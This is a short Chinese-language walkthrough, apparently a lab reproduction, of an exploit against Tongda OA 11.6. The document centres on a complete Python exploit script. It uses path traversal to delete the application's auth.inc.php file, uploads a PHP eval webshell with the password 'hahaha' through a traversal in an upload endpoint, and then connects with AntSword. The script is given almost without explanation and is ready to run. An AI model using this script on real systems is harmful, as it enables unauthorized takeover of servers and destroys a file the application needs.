环境搭建安装OA访问网站使用exp脚本蚁剑拿shell
环境搭建
现在通达官网已经把版本升级到了11.7,所以下载11.6版本需要去第三方下载平台
安装OA
傻瓜式安装,配置界面如下。完成安装之后就可以暂时不用管它了
访问网站
界面如下:
使用exp脚本
脚本内容如下,核心思路就是删除网站里的一个名为auth.inc.php的文件,进而越权拿shell
import requests#填写iptarget="http://ip/" #一句话木马的密码是hahaha payload="<?php eval($_POST['hahaha']);?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")input("Press enter to continue")print("[*]Deleting auth.inc.php....")#删除网站里的一个名为auth.inc.php的文件url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php" requests.get(url=url)print("[*]Checking if file deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.' not in page:print("[-]Failed to deleted auth.inc.php")exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"files = {'FILE1': ('deconf.php', payload)}requests.post(url=url,files=files)url=target+"/_deconf.php"page=requests.get(url=url).textif 'No input file specified.' not in page:print("[+]Filed Uploaded Successfully")print("[+]URL:",url)else:print("[-]Failed to upload file")
程序执行之后出现了一个URL,那个URL就是一句话木马所在位置